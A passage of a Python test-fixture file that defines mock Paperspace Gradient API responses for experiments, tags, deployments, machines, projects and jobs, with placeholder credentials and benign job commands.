LIST_OF_EXPERIMENTS_FILTERED_WITH_TWO_PROJECTS_STDOUT = """+--------+----------------+---------+ | Name | ID | Status | +--------+----------------+---------+ | dsfads | esj8mcpaayh5kx | failed | | dsfads | estun7jhqta8sm | failed | | dsfads | es08mwh7ye6zpm | failed | | None | eshdufkt9ti8mx | stopped | | None | e07h0ym8fewm | stopped | | None | e0fq31vyla039 | stopped | | None | esxz3ihfl9qxs2 | stopped | | job 5 | ecqq0rz0gok9i | stopped | | job 4 | es310784c1o1x6 | stopped | | job 3 | esabwtehoekn6w | stopped | | job 2 | ea1d6t082wq7i | stopped | | job 1 | esbipxwngbmji4 | stopped | | None | e8lufvr2bh8ld | failed | | dsfads | esasysj42i2j2s | failed | | job 4 | estgm33hfbqf5k | stopped | | job 3 | esbo3pisqq3t68 | stopped | | job 2 | eso8s7e014681 | stopped | | job 1 | esml2ioetny5o6 | stopped | +--------+----------------+---------+ """ LIST_OF_EXPERIMENTS_FILTERED_BUT_NONE_FOUND = { "data": [ { "data": [], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr4yxj95" }, "totalItems": 0 } }, { "data": [], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr1opq9u" }, "totalItems": 0 } } ], "message": "success", "meta": { "filter": [], "limit": 1000000, "offset": 0, "totalItems": 0 } } UPDATE_TAGS_RESPONSE = [ { "tagId": 1, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.506Z", "dtDeleted": None, "userId": 1, "id": 1, "entity_id": 3, "tag": { "name": "test0", "dtCreated": "2020-02-01T12:46:58.480Z", "id": 1 } }, { "tagId": 2, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.507Z", "dtDeleted": None, "userId": 1, "id": 2, "entity_id": 3, "tag": { "name": "test2", "dtCreated": "2020-02-01T12:46:58.481Z", "id": 2 } }, { "tagId": 3, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.509Z", "dtDeleted": None, "userId": 1, "id": 3, "entity_id": 3, "tag": { "name": "test1", "dtCreated": "2020-02-01T12:46:58.482Z", "id": 3 } }, { "tagId": 4, "entity": "experiment", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.510Z", "dtDeleted": None, "userId": 1, "id": 4, "entity_id": 3, "tag": { "name": "test3", "dtCreated": "2020-02-01T12:46:58.483Z", "id": 4 } } ] GET_TAGS_RESPONSE = { "some_id": [ { "tagId": 1, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.506Z", "dtDeleted": None, "userId": 1, "id": 1, "entity_id": 3, "tag": { "name": "test0", "dtCreated": "2020-02-01T12:46:58.480Z", "id": 1 } }, { "tagId": 2, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.507Z", "dtDeleted": None, "userId": 1, "id": 2, "entity_id": 3, "tag": { "name": "test2", "dtCreated": "2020-02-01T12:46:58.481Z", "id": 2 } }, { "tagId": 3, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.509Z", "dtDeleted": None, "userId": 1, "id": 3, "entity_id": 3, "tag": { "name": "test1", "dtCreated": "2020-02-01T12:46:58.482Z", "id": 3 } }, { "tagId": 4, "entity": "entity", "entityId": 3, "dtCreated": "2020-02-01T12:46:58.510Z", "dtDeleted": None, "userId": 1, "id": 4, "entity_id": 3, "tag": { "name": "test3", "dtCreated": "2020-02-01T12:46:58.483Z", "id": 4 } } ] } CREATE_DEPLOYMENT_WITH_BASIC_OPTIONS_RESPONSE = { "deployment": { "id": "sadkfhlskdjh", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "batman.bin.supraman@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://www.latlmes.com/breaking/paperspace-now-has-a-100-bilion-valuation", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "some_oauth_secret", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desanw1jptk7woh:predict", "ports": None, "dtCreated": "2019-04-04T10:27:22.659Z", "dtModified": "2019-04-04T10:27:22.659Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": None, "dtDeleted": None, "isDeleted": False } } LIST_DEPLOYMENTS = { "deploymentList": [ { "id": "dev61ity7lx232", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": "some_tag", "params": None, "code": "some_code", "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": "some_username", "imagePassword": "some_password", "workspaceUrl": "https://www.example.com", "workspaceUsername": "some_username", "workspacePassword": "some_password", "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "some_auth_token", "annotations": {}, "oauthKey": "some_oauth_key", "oauthSecret": "some_oauth_secret", "serviceType": "some_service_type", "apiType": "some_api_type", "endpoint": "https://development-services.paperspace.io/model-serving/dev61ity7lx232:predict", "ports": "5000", "dtCreated": "2019-04-04T10:53:56.665Z", "dtModified": "2019-04-04T10:53:56.729Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:53:56.711Z", "dtDeleted": None, "isDeleted": False, "metricsURL": "aws-testing.paperspace.io", }, { "id": "desanw1jptk7woh", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desanw1jptk7woh:predict", "ports": None, "dtCreated": "2019-04-04T10:27:22.659Z", "dtModified": "2019-04-04T10:27:22.726Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:27:22.710Z", "dtDeleted": None, "isDeleted": False }, { "id": "desfnnrqt1v633v", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desfnnrqt1v633v:predict", "ports": None, "dtCreated": "2019-04-04T10:27:10.180Z", "dtModified": "2019-04-04T10:27:10.248Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:27:10.230Z", "dtDeleted": None, "isDeleted": False }, { "id": "desdyn55d2e02su", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/desdyn55d2e02su:predict", "ports": None, "dtCreated": "2019-04-04T10:11:10.204Z", "dtModified": "2019-04-04T10:11:10.281Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T10:11:10.260Z", "dtDeleted": None, "isDeleted": False }, { "id": "des3tmqa3s627o9", "ownerId": "tejxgn5bt", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "state": "Stopped", "startedByUserId": "ukgvw4i8", "startedByUserEmail": "bartosz@paperspace.com", "deploymentType": "TFServing", "modelId": "mosu30xm7q8vb0p", "modelUrl": "s3://ps-projects-development/prmr22ve0/ehla1kvbwzaco/model/", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "PS Jobs on GCP", "machineType": "K80", "imageUrl": "https://github.com/Paperspace/mnist-sample", "imageUsername": None, "imagePassword": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": "-----", "annotations": {}, "oauthKey": "-----", "oauthSecret": "-----", "serviceType": "model", "apiType": "REST", "endpoint": "https://development-services.paperspace.io/model-serving/des3tmqa3s627o9:predict", "ports": None, "dtCreated": "2019-04-04T09:29:22.277Z", "dtModified": "2019-04-04T09:29:22.345Z", "dtBuildStarted": None, "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2019-04-04T09:29:22.327Z", "dtDeleted": None, "isDeleted": False } ], "total": 5, "displayTotal": 5, "runningTotal": 0 } CREATE_MACHINE_RESPONSE = { "id": "psclbvqpc", "name": "some_machine", "os": None, "ram": None, "cpus": 1, "gpu": None, "storageTotal": None, "storageUsed": None, "usageRate": "Pro hourly", "shutdownTimeoutInHours": 168, "shutdownTimeoutForces": False, "performAutoSnapshot": False, "autoSnapshotFrequency": None, "autoSnapshotSaveCount": None, "dynamicPublicIp": False, "agentType": "WindowsDesktop", "dtCreated": "2019-04-10T14:19:49.852Z", "state": "provisioning", "updatesPending": False, "networkId": None, "privateIpAddress": None, "publicIpAddress": None, "region": None, "userId": "u3z4be26", "teamId": "te6hh34n6", "scriptId": None, "dtLastRun": None } LIST_MACHINES_RESPONSE = [ { "ram": None, "userId": "u3z4be26", "cpus": 1, "teamId": "te6hh34n6", "updatesPending": False, "dynamicPublicIp": False, "storageTotal": None, "shutdownTimeoutForces": False, "id": "psclbvqpc", "shutdownTimeoutInHours": 168, "state": "provisioning", "usageRate": "Pro hourly", "publicIpAddress": None, "gp": None, "privateIpAddress": None, "dtCreated": "2019-04-10T14:19:49.852Z", "dtLastRun": None, "storageUsed": None, "scriptId": None, "autoSnapshotSaveCount": None, "name": "keton2", "agentType": "WindowsDesktop", "performAutoSnapshot": False, "networkId": None, "autoSnapshotFrequency": None, "os": None, "region": None }, { "ram": "536870912", "userId": "u3z4be26", "cpus": 1, "teamId": "te6hh34n6", "updatesPending": False, "dynamicPublicIp": False, "storageTotal": "53687091200", "shutdownTimeoutForces": False, "id": "psbtuwfvt", "shutdownTimeoutInHours": 1, "state": "off", "usageRate": "C1 Hourly", "publicIpAddress": None, "gp": "None", "privateIpAddress": "10.64.14.135", "dtCreated": "2019-04-11T18:10:29.665Z", "dtLastRun": None, "storageUsed": "110080", "scriptId": None, "autoSnapshotSaveCount": 1, "name": "New Machine 1", "agentType": "LinuxHeadless", "performAutoSnapshot": True, "networkId": "nng82wb", "autoSnapshotFrequency": "month", "os": "Ubuntu 18.04.1 LTS; uname: 4.15.0-38-generic; distro: ubuntu; major: 18; minor: 04", "region": "East Coast (NY2)" } ] SHOW_MACHINE_RESPONSE = { "id": "some_id", "name": "New Machine 1", "os": "Ubuntu 18.04.1 LTS; uname: 4.15.0-38-generic; distro: ubuntu; major: 18; minor: 04", "ram": "536870912", "cpus": 1, "gpu": "None", "storageTotal": "53687091200", "storageUsed": "110080", "usageRate": "C1 Hourly", "shutdownTimeoutInHours": 1, "shutdownTimeoutForces": False, "performAutoSnapshot": True, "autoSnapshotFrequency": "month", "autoSnapshotSaveCount": 1, "dynamicPublicIp": False, "agentType": "LinuxHeadless", "dtCreated": "2019-04-11T18:10:29.665Z", "state": "off", "updatesPending": False, "networkId": "nng82wb", "privateIpAddress": "10.64.14.135", "publicIpAddress": None, "region": "East Coast (NY2)", "userId": "u3z4be26", "teamId": "te6hh34n6", "scriptId": None, "dtLastRun": None, "events": [ { "name": "restart", "state": "done", "errorMsg": "", "handle": "042454c4-af4c-489a-8bff-b4d3e9f39f9e", "dtModified": "2019-04-12T12:19:05.801Z", "dtFinished": "2019-04-12T12:19:05.801Z", "dtCreated": "2019-04-12T12:19:03.814Z" }, { "name": "stop", "state": "done", "errorMsg": "", "handle": "07fe20ce-35c4-4949-afbd-103d1afc6797", "dtModified": "2019-04-11T19:11:19.942Z", "dtFinished": "2019-04-11T19:11:19.942Z", "dtCreated": "2019-04-11T19:11:14.205Z" }, { "name": "snapshot-create", "state": "done", "errorMsg": "", "handle": "7fa0ab4f-896d-42ac-a2c5-54f0a94c2310", "dtModified": "2019-04-11T18:14:36.702Z", "dtFinished": "2019-04-11T18:14:36.702Z", "dtCreated": "2019-04-11T18:14:33.216Z" }, { "name": "start", "state": "done", "errorMsg": "", "handle": "c04cccdf-3823-4ef1-b1ab-83b3ccdcfcb7", "dtModified": "2019-04-11T18:11:00.371Z", "dtFinished": "2019-04-11T18:11:00.371Z", "dtCreated": "2019-04-11T18:10:45.468Z" }, { "name": "create", "state": "done", "errorMsg": "", "handle": "34f64d24-1161-42f0-871d-1ed03b10dfc0", "dtModified": "2019-04-11T18:10:45.473Z", "dtFinished": "2019-04-11T18:10:45.473Z", "dtCreated": "2019-04-11T18:10:29.665Z" } ] } SHOW_MACHINE_UTILIZATION_RESPONSE = { "machineId": "some_key", "utilization": { "machineId": "some_key", "secondsUsed": 0, "billingMonth": "2017-09", "hourlyRate": 0, }, "storageUtilization": { "machineId": "some_key", "secondsUsed": 256798.902394, "monthlyRate": "5.00", "billingMonth": "2017-09", }, } LIST_PROJECTS_RESPONSE = { "data": [ { "name": "test_project", "handle": "prq70zy79", "dtCreated": "2019-03-18T13:24:46.666Z", "dtDeleted": None, "lastJobSeqNum": 2, "repoNodeId": None, "repoName": None, "repoUrl": None, "experiments": { "data": [ { "dtCreated": "2019-04-05T15:10:55.692629+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-04-05T15:10:55.692629+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 22159, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "estgcoux8igx32", "id": 22123, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1655, "state": 1, "templateHistory": { "dtCreated": "2019-04-05T15:10:54.923725+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 22159, "params": { "is_preemptible": False, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2", "worker_use_dockerfile": False, "workspaceUrl": "example.com" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "prq70zy79" }, "totalItems": 1 } } }, { "name": "keton", "handle": "prmr22ve0", "dtCreated": "2019-03-25T14:50:43.202Z", "dtDeleted": None, "lastJobSeqNum": 8, "repoNodeId": None, "repoName": None, "repoUrl": None, "experiments": { "data": [ { "dtCreated": "2019-04-02T15:17:03.393886+00:00", "dtDeleted": None, "dtFinished": "2019-04-02T17:02:54.654569+00:00", "dtModified": "2019-04-02T15:17:03.393886+00:00", "dtProvisioningFinished": "2019-04-02T15:17:10.978198+00:00", "dtProvisioningStarted": "2019-04-02T15:17:10.978198+00:00", "dtStarted": "2019-04-02T15:17:10.978198+00:00", "dtTeardownFinished": "2019-04-02T17:02:54.654569+00:00", "dtTeardownStarted": "2019-04-02T17:02:54.654569+00:00", "experimentError": None, "experimentTemplateHistoryId": 22130, "experimentTemplateId": 174, "experimentTypeId": 1, "handle": "ehla1kvbwzaco", "id": 22094, "projectHandle": "prmr22ve0", "projectId": 626, "started_by_user_id": 1655, "state": 5, "templateHistory": { "dtCreated": "2019-04-02T15:17:02.663449+00:00", "dtDeleted": None, "experimentTemplateId": 174, "id": 22130, "params": { "is_preemptible": False, "model_path": "/artifacts", "model_type": "Tensorflow", "name": "Test1", "ports": 5000, "project_handle": "prmr22ve0", "worker_command": "python mnist.py --data_format=channels_last", "worker_container": "tensorflow/tensorflow:1.13.1-py3", "worker_machine_type": "K80", "workspaceUrl": "https://github.com/Paperspace/mnist-sample" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "prmr22ve0" }, "totalItems": 1 } } }, { "name": "paperspace-python", "handle": "przhbct98", "dtCreated": "2019-04-04T15:12:34.229Z", "dtDeleted": None, "lastJobSeqNum": 3, "repoNodeId": None, "repoName": None, "repoUrl": None, "experiments": { "data": [ { "dtCreated": "2019-04-24T10:18:30.523193+00:00", "dtDeleted": None, "dtFinished": "2019-04-24T10:18:43.613748+00:00", "dtModified": "2019-04-24T10:18:30.523193+00:00", "dtProvisioningFinished": "2019-04-24T10:18:35.010792+00:00", "dtProvisioningStarted": "2019-04-24T10:18:35.010792+00:00", "dtStarted": "2019-04-24T10:18:35.010792+00:00", "dtTeardownFinished": "2019-04-24T10:18:43.613748+00:00", "dtTeardownStarted": "2019-04-24T10:18:43.613748+00:00", "experimentError": None, "experimentTemplateHistoryId": 22311, "experimentTemplateId": 186, "experimentTypeId": 1, "handle": "es47og38wzhnuo", "id": 22270, "projectHandle": "przhbct98", "projectId": 649, "started_by_user_id": 1655, "state": 7, "templateHistory": { "dtCreated": "2019-04-24T10:18:30.523193+00:00", "dtDeleted": None, "experimentTemplateId": 186, "id": 22311, "params": { "command": ". test.sh\npython2 hello.py", "container": "paperspace/tensorflow-python", "machineType": "G1", "project": "paperspace-python", "workspaceFileName": "temp.zip" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "przhbct98" }, "totalItems": 1 } } } ], "meta": { "totalItems": 3 } } LIST_JOBS_RESPONSE_JSON = { "jobList": [ { "id": "jsxeeba5qq99yn", "name": "job 1", "state": "Error", "workspaceUrl": "none", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "nvidia-smi", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "K80", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "K80 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": "Error quering for experiment for job: sql: Scan error on column index 4, name \"model_path\": unsupported Scan, storing driver.Value type <nil> into type *string", "dtCreated": "2019-03-25T14:51:16.118Z", "dtModified": "2019-03-25T14:51:16.118Z", "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-03-27T13:53:34.188Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "exitCode": None, "queuePosition": None, "seqNum": 1, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553525480", "fqdn": "jsxeeba5qq99yn.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": None, "cpuCount": None, "cpuModel": None, "cpuFlags": None, "cpuMem": None, "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "aws-testing.paperspace.io", "customMetrics": None, "experimentId": "esk8lny3pxyqd6", "tags": [ "tag1", "tag2", ], }, { "id": "jfl063dsv634h", "name": "job 2", "state": "Stopped", "workspaceUrl": "none", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "nvidia-smi", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T14:54:30.866Z", "dtModified": "2019-03-25T14:54:30.866Z", "dtProvisioningStarted": "2019-03-25T14:59:15.818Z", "dtProvisioningFinished": "2019-03-25T14:59:20.542Z", "dtStarted": "2019-03-25T14:59:20.542Z", "dtFinished": "2019-03-25T14:59:25.631Z", "dtTeardownStarted": "2019-03-25T14:59:25.669Z", "dtTeardownFinished": "2019-03-25T14:59:25.758Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 2, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553525723", "fqdn": "jfl063dsv634h.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553525723", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "ejd2v80p7cw6m" }, { "id": "jsvau8w47k78zm", "name": "Clone - jfl063dsv634h", "state": "Stopped", "workspaceUrl": "none", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "nvidia-smi", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": "jfl063dsv634h", "jobError": None, "dtCreated": "2019-03-25T15:04:43.844Z", "dtModified": "2019-03-25T15:04:43.844Z", "dtProvisioningStarted": "2019-03-25T15:07:43.854Z", "dtProvisioningFinished": "2019-03-25T15:07:48.435Z", "dtStarted": "2019-03-25T15:07:48.435Z", "dtFinished": "2019-03-25T15:07:53.523Z", "dtTeardownStarted": "2019-03-25T15:07:53.561Z", "dtTeardownFinished": "2019-03-25T15:07:53.649Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 3, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526309", "fqdn": "jsvau8w47k78zm.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526309", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": None }, { "id": "j2eq99xhvgtum", "name": "keton1-worker-1", "state": "Pending", "workspaceUrl": None, "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo keton", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:07:30.383Z", "dtModified": "2019-03-25T15:07:30.383Z", "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-03-25T15:07:30.383Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "exitCode": None, "queuePosition": None, "seqNum": 4, "storageRegion": "GCP West", "clusterMachine": None, "fqdn": "j2eq99xhvgtum.dgradient.paperspace.com", "ports": "5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": None, "cpuCount": None, "cpuModel": None, "cpuFlags": None, "cpuMem": None, "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esibxync23szaq" }, { "id": "jzzinybinuxf9", "name": "keton2-worker-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/multinode-mnist", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo keton", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:18:51.461Z", "dtModified": "2019-03-25T15:18:51.461Z", "dtProvisioningStarted": "2019-03-25T15:18:58.089Z", "dtProvisioningFinished": "2019-03-25T15:19:03.246Z", "dtStarted": "2019-03-25T15:19:03.246Z", "dtFinished": 